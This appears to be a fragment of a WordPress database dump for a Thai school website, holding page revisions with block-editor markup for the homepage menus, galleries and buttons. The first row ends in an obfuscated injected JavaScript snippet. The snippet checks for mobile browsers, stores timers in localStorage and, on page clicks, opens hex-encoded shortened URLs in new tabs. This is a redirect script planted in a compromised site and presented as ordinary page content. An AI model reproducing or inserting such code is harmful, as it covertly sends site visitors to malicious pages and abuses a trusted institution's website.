_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี','','inherit','closed','closed','','824-revision-v1','','','2024-08-15 09:24:20','2024-08-15 02:24:20','',824,'http://pakhaeng.ssk.in.th/?p=826',0,'revision','',0),
(827,1,'2024-08-15 09:24:40','2024-08-15 02:24:40','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f 